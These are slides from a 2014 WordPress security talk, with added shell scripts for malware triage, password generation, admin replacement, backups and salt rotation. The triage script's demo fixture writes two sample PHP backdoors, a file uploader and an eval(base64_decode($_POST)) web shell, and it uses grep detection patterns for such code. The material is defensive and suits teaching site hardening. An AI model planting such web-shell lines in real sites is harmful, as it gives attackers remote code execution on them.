WORDPRESS SECURITY ESSENTIALS
Boulder Digital Arts Lunch, June 12, 2014
By Angela Bowman, Ask WP Girl
About me
• Hi! My name is Angela Bowman @askwpgirl
• WordPress Instructor at Boulder Digital Arts
• Started using WordPress in 2007
• Used to think: “After I build a site, my job is done.”
• Now take a common sense approach to security that isn’t overwhelming or super technical
Why do we need to have this talk?
• WordPress runs on PHP and MySQL, and both are exposed to every request that reaches your site
• MySQL: the database where all your content (posts, pages, users, settings) is stored
• PHP: the scripting language that WordPress, themes and plugins use to read your data and display it in the browser window
• Hackers exploit poorly written PHP (and other vulnerabilities) to inject content into your database and files, often with nothing more than a crafted URL or form submission
Why are you vulnerable?
• Because your site is on the Internet
• Because it’s easy to exploit known vulnerabilities
• Because we are human NOT Vulcan
• We live by our beliefs rather than logic
WHAT DOES A HACKED FILE LOOK LIKE? UGLY!
(Screenshots shown in the talk:)
• Spam injected into a page (“Viagra anyone?”)
• Hacked comments.php
• A file that doesn’t belong: common.php
• TimThumb hack
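To make the screenshots concrete, here is an added example (not from the slides or Angela’s own material) of a POSIX shell triage scan for the three kinds of compromise shown above: a PHP file dropped into wp-content/uploads where only media belongs (the common.php that doesn’t belong), a bundled timthumb.php, and a theme file such as comments.php carrying an obfuscated eval() payload. The sample site tree, file names and grep patterns are constructed for the demo; the patterns are a starting point for a manual look, not a complete malware signature set.

```shell
#!/bin/sh
# Added example, not from the slides: a triage scan for the kinds of
# compromise shown in the screenshots above. The sample site tree built by
# make_sample_site is constructed for the demo; the patterns are a starting
# point for a manual look, not a complete malware signature set.

count() { wc -l | tr -d ' '; }

# PHP files under wp-content/uploads. Media uploads are images and documents,
# so an executable PHP file there (the "common.php that doesn't belong") is
# almost always a dropped backdoor.
php_in_uploads() {
    find "$1/wp-content/uploads" -type f \
        \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php5' \) 2>/dev/null
}

# Copies of the TimThumb image-resizing script bundled inside themes or plugins.
# Old versions are the "TimThumb hack"; every copy should be checked or removed.
find_timthumb() {
    find "$1/wp-content" -type f \( -iname 'timthumb.php' -o -iname 'thumb.php' \) 2>/dev/null
}

# PHP files containing patterns common in injected backdoors and spam droppers:
# eval() over a base64/gzip/rot13-decoded blob, or eval()/assert() fed straight
# from a request parameter.
suspicious_php() {
    find "$1/wp-content" -type f -iname '*.php' -exec grep -lE \
        'eval *\( *(base64_decode|gzinflate|gzuncompress|str_rot13) *\(|(eval|assert) *\( *\$_(GET|POST|REQUEST|COOKIE)' \
        {} + 2>/dev/null || true
}

# Run all three checks, print each finding on stderr, and output the total.
scan_site() {
    total=0
    for check in php_in_uploads find_timthumb suspicious_php; do
        "$check" "$1" | sed "s/^/$check: /" >&2
        total=$((total + $("$check" "$1" | count)))
    done
    echo "$total"
}

# Constructed sample tree: two clean files plus one of each problem.
make_sample_site() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2014/06" "$root/wp-content/themes/demo"
    printf 'JFIF' >"$root/wp-content/uploads/2014/06/photo.jpg"
    printf '%s\n' '<?php add_action("init", "demo_init");' >"$root/wp-content/themes/demo/functions.php"
    # a dropped uploader in uploads/, a stand-in timthumb, and a backdoored comments.php
    printf '%s\n' '<?php move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]);' \
        >"$root/wp-content/uploads/2014/06/common.php"
    printf '%s\n' '<?php // TimThumb 1.x stand-in (constructed)' >"$root/wp-content/themes/demo/timthumb.php"
    printf '%s\n' '<?php eval(base64_decode($_POST["c"])); /* real comments.php follows */' \
        >"$root/wp-content/themes/demo/comments.php"
    echo "$root"
}

if [ "${1:-}" = "--demo" ]; then
    site=$(make_sample_site)
    echo "findings: $(scan_site "$site")"
    rm -rf "$site"
fi
```

Run it as `sh scan.sh --demo` to see the three findings, or call `scan_site /path/to/site` over a real install (over SFTP-mounted files or on the host itself). A hit from any of the three checks is a reason to pull the file and look at it by hand, not proof of compromise on its own; some legitimate plugins still ship TimThumb.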
THE MYTHS WE LIVE BY
Inspired by: http://www.problogger.net/archives/2012/08/29/top-10-wordpress-security-myths/ by Anders Vinther of The WordPress Security Checklist.
Myth #1
“WordPress is (is not) secure.”
Truth
• Both things are true!
• Old versions of WordPress are NOT secure
• The current WordPress version is secure: known holes get patched, which is exactly why you have to keep it current
Myth #2
“My site isn’t launched, so it can’t be hacked.”
Truth
• You have an Internet presence even if the pages of your site aren’t indexed by Google yet
• You need to protect ALL installations of WordPress on your hosting account, even the ones you don’t use
• Hackers will attempt to exploit things that aren’t even on your site, such as plugins you don’t have installed: automated scanners try known vulnerable paths on every host they find
Myth #3
“I only use plugins and themes from WordPress.org, so I am safe!”
Truth
• Plugins and themes are the #1 way hackers gain access to your site
• Why? From ProBlogger.com: “Experience and programming skills vary greatly, and so does the quality of their work. Even the best programmers make mistakes and all software contains bugs.”
Myth #4
“Updating my themes and plugins whenever I log in is good enough.”
Truth
• Exploits are published IMMEDIATELY to the web
• Outdated versions of WordPress, themes, and plugins are immediately vulnerable to attack
• The TimThumb script exploit was discovered and exploited on a mass number of blogs within DAYS and is still exploited!
Myth #5
“My site is small. It’s not worth hacking.”
Truth
• Automated attacks don’t check how popular a site is. From http://wptheming.com/2011/08/cleaning-up-the-timthumb-hack/:
“… Although I had updated the majority of sites and had notified former clients, I still hadn’t gotten to some of the smaller sites yet – like my girlfriend’s food blog.”
“And, word to the wise, your girlfriend’s food blog should always be a top priority.”
Myth #6
“If I de-activate a theme or plugin, there is no risk.”
Truth
• De-activated themes and plugins are just as risky if they have vulnerable code
• Even the files of deactivated plugins and themes can be accessed directly via the Internet: they still sit under wp-content, and the web server will happily run them
Myth #7
“If my site is compromised, I’ll find out right away!”
Truth
• Only if you use a site monitoring service or plugin (maybe)
• Your site can be compromised months before you find out
• Many hacks are invisible to visitors and only show up for bots (search-engine crawlers), so you may not know you’ve been hacked until your site is blacklisted
• Some hacks redirect only search-engine traffic, so you won’t notice if you just go to a specific URL
See http://blog.sucuri.net/2012/07/backdoor-tool-kit-todays-scary-web-malware-reality.html
Myth #8
“I can use a security plugin and that will cover me.”
Truth
• Some security plugins can provide a layer of protection
• Security plugins won’t help much if a hacker gains access to your online session, passwords, or sensitive files
• Security plugins won’t help if the web hosting server is compromised
Myth #9
“My passwords are good enough.”
Truth
• “Only purely random passwords, generated by special purpose generator tokens, drawing from the largest ASCII character sets available can keep a step ahead of cracking programs.”
• http://www.mandylionlabs.com/PRCCalc/BruteForceCalc.htm
Myth #10
“If my site is hacked, my web host can restore it for me.”
Truth
• If you discover the hack quickly enough, your web host may have a backup of the site made before the hack
• Most hosts store one daily backup and one weekly backup
• Your host may not be able to help you discover why you were hacked in the first place, so you’ll end up restoring the same hackable files
WHAT CAN YOU DO TO PROTECT YOUR SITE?
Options
• Set up an altar to the WordPress Gods and do daily puja and offerings
• Throw up your hands and cry
• Drink another beer and try to forget
• Delegate to Tony (Sucuri.net)
• DIY using the following steps
1 – Secure Your Own Computer
• Why bother securing WordPress if you give the keys away?
• Run anti-virus software regularly
• Don’t log in over insecure or public Wi-Fi networks
• Use a Virtual Private Network when traveling (such as Astrill)
• Secure your home Wi-Fi network
• Be careful which links you click. More than 55,000 malicious web domains existed in 2011.
2 – Update to Current Versions
• Back up database and files first
• Delete unused plugins and themes
• Update plugins first (check compatibility)
• Update theme (might be tricky)
• Update WordPress
• If the site crashes after an update, rename the wp-content/plugins folder via FTP/SFTP to disable all plugins at once, then rename it back and re-activate them one at a time to find the culprit
3 – Protect Login
• If “admin” is the Administrative username, create a new admin user, log out, log in as the new user, delete the old “admin” user and assign its posts/pages to the new admin
• Use strong passwords on WordPress, FTP, hosting, and email:
• Online Generator: http://www.pctools.com/guides/password/
• Track Passwords: http://agilebits.com/products/1Password
3 – Protect Login, continued
• Enable two-step (two-factor) authentication using Google Authenticator: http://wordpress.org/extend/plugins/google-authenticator/ and http://askwpgirl.com/secure-wordpress-two-step-authentication/
• Log in using https:// so your password and session cookie aren’t sent in the clear (you’ll need a dedicated SSL certificate for the domain, which is free with Business level web hosting at Host Gator)
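As an added example (not part of the slides), the following POSIX shell script generates a password locally rather than through an online generator, checks it against a minimum policy, and replaces the “admin” account the way the first bullet above describes, using WP-CLI instead of clicking through the dashboard. It assumes WP-CLI is installed on the host; the site path, the new login name and the e-mail address are placeholders.

```shell
#!/bin/sh
# Added example, not from the slides: generate a password locally, check it
# against a minimum policy, and replace the "admin" account with a new
# administrator using WP-CLI (assumed to be installed on the host; see
# https://wp-cli.org/). Site path, new login name and e-mail are placeholders.

# Characters allowed in generated passwords: letters, digits and symbols that
# cause no trouble in shells, SQL or config files (no quotes, backslash or pipe).
CHARSET='A-Za-z0-9!#$%&()*+,./:;<=>?@^_~-'

# Print LEN (default 24) characters drawn from the OS CSPRNG (/dev/urandom).
# tr -dc drops every byte outside CHARSET, so each kept character is uniformly
# distributed over the set (rejection sampling, no modulo bias).
gen_password() {
    len=${1:-24}
    head -c 4096 /dev/urandom | LC_ALL=C tr -dc "$CHARSET" | head -c "$len"
    echo
}

# Exit 0 if the password is at least 16 characters long and contains a
# lower-case letter, an upper-case letter, a digit and a symbol.
password_ok() {
    p=$1
    [ "${#p}" -ge 16 ] || return 1
    printf '%s' "$p" | LC_ALL=C grep -q '[a-z]' || return 1
    printf '%s' "$p" | LC_ALL=C grep -q '[A-Z]' || return 1
    printf '%s' "$p" | LC_ALL=C grep -q '[0-9]' || return 1
    printf '%s' "$p" | LC_ALL=C grep -q '[^A-Za-z0-9]' || return 1
}

# Replace the default "admin" user as step 3 describes: create a new
# administrator with a generated password, then delete "admin" and reassign
# its posts and pages to the new user. Stops at the first step that fails, so
# "admin" is never deleted before its replacement exists.
replace_admin_user() {
    site=$1; newlogin=$2; email=$3
    pass=$(gen_password 24)
    wp --path="$site" user create "$newlogin" "$email" \
        --role=administrator --user_pass="$pass" || return 1
    newid=$(wp --path="$site" user get "$newlogin" --field=ID) || return 1
    wp --path="$site" user delete admin --reassign="$newid" --yes || return 1
    # Shown once so it can go straight into a password manager (1Password etc.);
    # don't leave it in shell history or a log file.
    echo "new administrator '$newlogin' created; password: $pass"
}

if [ "${1:-}" = "--demo" ]; then
    p=$(gen_password 24)
    echo "generated: $p"
    password_ok "$p" && echo "meets policy" || echo "regenerate: missing a character class"
    # replace_admin_user /var/www/example.com newadminname you@example.com   (placeholders)
fi
```

A freshly generated 24-character password can, rarely, miss one character class; the demo loop simply regenerates in that case. Passing `--user_pass` on the command line exposes it briefly in the process list on a shared host; WP-CLI’s global `--prompt=user_pass` option reads it interactively instead.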
4 – Backup Database and Uploads
• Use a backup plugin or service:
• BackupBuddy (affiliate link): http://askwpgirl.com/go/backupbuddy.php
• BackWPup: https://wordpress.org/plugins/backwpup/
• VaultPress.com – backup, one-click restore, and site monitoring
• Back up the database (daily or weekly) and the full site (weekly or monthly)
• Store backups on a remote server (e.g. Amazon S3), not only on the web host that could be compromised
• You must back up both the database and the wp-content folder (themes, plugins, uploads); the rest of WordPress can be re-downloaded
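For people who would rather script this than install another plugin, here is an added example (not from the slides) of the minimum the slide asks for: a database dump, a wp-content archive with a SHA-256 manifest, a verification step, and a restore. The mysqldump and S3 functions need a live server and a configured AWS CLI and are assumptions; the demo site tree is constructed.

```shell
#!/bin/sh
# Added example, not from the slides: back up the two things step 4 says must
# be backed up (the database and wp-content), write a checksum manifest, and
# verify an archive before trusting it. mysqldump and the remote copy need a
# live server and are not exercised by the demo; site path, database name and
# S3 bucket are placeholders. The demo site tree is constructed.

sha256cmd() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"; else shasum -a 256 "$@"; fi
}

# Database dump. mysqldump reads credentials from ~/.my.cnf so the password
# never appears on the command line (visible in `ps`). --single-transaction
# gives a consistent snapshot of InnoDB tables without locking the site.
backup_db() {
    dbname=$1; dest=$2; stamp=$3
    mysqldump --single-transaction --quick "$dbname" | gzip -c >"$dest/db-$stamp.sql.gz"
}

# Archive wp-content (themes, plugins, uploads) and record its SHA-256 next to it.
backup_files() {
    site=$1; dest=$2; stamp=$3
    tar -C "$site" -czf "$dest/wp-content-$stamp.tar.gz" wp-content
    (cd "$dest" && sha256cmd "wp-content-$stamp.tar.gz" >"wp-content-$stamp.sha256")
}

# Exit 0 only if the archive still matches its checksum and actually contains
# the uploads directory (an empty or truncated archive is worse than none).
verify_backup() {
    dest=$1; stamp=$2
    (cd "$dest" && sha256cmd -c "wp-content-$stamp.sha256" >/dev/null 2>&1) || return 1
    tar -tzf "$dest/wp-content-$stamp.tar.gz" | grep -q '^wp-content/uploads/'
}

# Restore wp-content from an archive into a site directory (e.g. a fresh
# install after a hack). Verify first; restoring a bad archive is a second outage.
restore_files() {
    archive=$1; site=$2
    tar -C "$site" -xzf "$archive"
}

# Copy the day's files off the server. Assumes the AWS CLI is configured;
# any remote destination works the same way, the point is "not on the web host".
push_remote() {
    dest=$1; stamp=$2; bucket=$3
    for f in "wp-content-$stamp.tar.gz" "wp-content-$stamp.sha256" "db-$stamp.sql.gz"; do
        aws s3 cp "$dest/$f" "s3://$bucket/backups/$f" || return 1
    done
}

# Constructed sample site for the demo.
make_sample_site() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2014/06" "$root/wp-content/themes/demo"
    printf 'JFIF' >"$root/wp-content/uploads/2014/06/photo.jpg"
    printf '%s\n' '<?php // demo theme' >"$root/wp-content/themes/demo/functions.php"
    echo "$root"
}

if [ "${1:-}" = "--demo" ]; then
    site=$(make_sample_site); dest=$(mktemp -d); stamp=$(date +%Y%m%d)
    backup_files "$site" "$dest" "$stamp"
    verify_backup "$dest" "$stamp" && echo "backup verified: $dest/wp-content-$stamp.tar.gz"
    rm -rf "$site" "$dest"
fi
```

Run the three backup functions from cron on the schedule the slide suggests (database daily, files weekly), then `push_remote`. The verification step is the part most plugins skip: a backup you have never restored is a hope, not a backup.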
5 – Install Security Plugins
• Install Wordfence http://wordpress.org/extend/plugins/wordfence/
• Settings: http://optimwise.com/wordfence-security-plugin-wordpress-firewall-anti-malware/
6 – Create a Maintenance Plan
• Update sites frequently (as updates available)
• Use Infinite WP to manage multiple sites from a single control panel: http://infinitewp.com/
7 – Best Practices
• Don’t allow users to register (Settings > General)
• Always hold comments for moderation and use spam filtering (e.g. Akismet)
• Don’t use your username as your Display Name (it hands attackers half of the login)
• Use SFTP for file transfers and secure (TLS) SMTP for email (ask your web host)
7 – Best Practices, continued
• Turn off pingbacks/trackbacks (Settings > Discussion)
• Host your site with a good web host
• Use plugins and themes with caution: choose ones that are recently updated and actively maintained. Delete unused ones, but keep one default TwentySomething theme installed as a fallback.
• Submit sites to Google Webmaster Tools and turn ON email notifications: http://googlewebmastercentral.blogspot.com/2012/07/new-crawl-error-alerts-from-webmaster.html
Summary
• Update, update, update!
• Use caution w/ plugins and themes, delete unused
• Strong usernames and passwords
• Backup! Today!
• Be a smart web user
If you get hacked…
• Contact your web host and see if they can restore the site from a backup (don’t rely on this)
• Contact sucuri.net to scan and clean the hack
• Change all passwords (WordPress, FTP/SFTP, hosting, database) and replace the security keys and salts in wp-config.php, which logs out every existing session, the attacker’s included
• Check blacklisting status (Google Webmaster Tools) and request a review once the site is clean
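The “reset the salts” step is easy to get wrong by hand (eight lines, and a missed one keeps old cookies valid). Here is an added example (not from the slides) that rotates all eight keys in wp-config.php from a POSIX shell, generating values locally instead of fetching them from api.wordpress.org. The wp-config.php it writes for the demo is a constructed stand-in with the placeholder values WordPress ships.

```shell
#!/bin/sh
# Added example, not from the slides: replace the eight security keys and salts
# in wp-config.php with fresh random values. WordPress signs login cookies with
# these, so rotating them invalidates every existing session and "remember me"
# cookie, the attacker's included. Values are generated locally instead of
# fetching https://api.wordpress.org/secret-key/1.1/salt/. The sample config
# written by write_sample_config is constructed for the demo.

WP_KEYS="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# 64 random characters from /dev/urandom, restricted to characters that need
# no escaping inside a single-quoted PHP string (no quotes or backslash).
rand_key() {
    head -c 4096 /dev/urandom | LC_ALL=C tr -dc 'A-Za-z0-9!#$%&()*+,./:;<=>?@^_~-' | head -c 64
}

# Rewrite each define('KEY', '...') line in the config in place and leave every
# other line untouched. Handles the single- and double-quoted spellings and the
# spacing used by wp-config-sample.php.
rotate_salts() {
    cfg=$1
    tmp="$cfg.tmp.$$"
    : >"$tmp"
    while IFS= read -r line || [ -n "$line" ]; do
        replaced=0
        for k in $WP_KEYS; do
            case $line in
                *"define('$k',"*|*"define( '$k',"*|*"define(\"$k\","*|*"define( \"$k\","*)
                    printf "define('%s', '%s');\n" "$k" "$(rand_key)" >>"$tmp"
                    replaced=1
                    break
                    ;;
            esac
        done
        [ "$replaced" -eq 1 ] || printf '%s\n' "$line" >>"$tmp"
    done <"$cfg"
    mv "$tmp" "$cfg"
}

# Print the current value of one key (used to confirm the rotation happened).
key_value() {
    grep "define( *['\"]$2['\"]" "$1" | sed "s/.*['\"]$2['\"], *['\"]\([^'\"]*\)['\"].*/\1/"
}

# Constructed stand-in for a real wp-config.php, with the placeholder values
# WordPress ships (the ones a never-edited install still has).
write_sample_config() {
    cat >"$1" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
$table_prefix = 'wp_';
define('WP_DEBUG', false);
EOF
}

if [ "${1:-}" = "--demo" ]; then
    cfg=$(mktemp)
    write_sample_config "$cfg"
    rotate_salts "$cfg"
    grep -E "define\('[A-Z_]*(KEY|SALT)'" "$cfg"
    rm -f "$cfg"
fi
```

Keep a copy of the old wp-config.php until you have logged in again; if the rewrite ever mangles the file, restoring it is one `mv`. Rotate the keys after changing passwords, not before, so the attacker cannot simply log back in with a password you have not changed yet.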
Resources
• Hacked: http://wordpress.org/tags/hacked
• Malware: http://wordpress.org/tags/malware
• http://codex.wordpress.org/Hardening_WordPress
• http://codex.wordpress.org/WordPress_Backups
• http://codex.wordpress.org/FAQ_My_site_was_hacked
• wpsecuritylock.com – resources and services for securing sites
• sucuri.net – free scan, hack recovery, site monitoring
• Wpsecuritychecklist.com – off-site monitoring
Contact
• Angela Bowman – askwpgirl.com / moongoosedesigns.com
• [email protected] – @askwpgirl – facebook.com/askwpgirl.com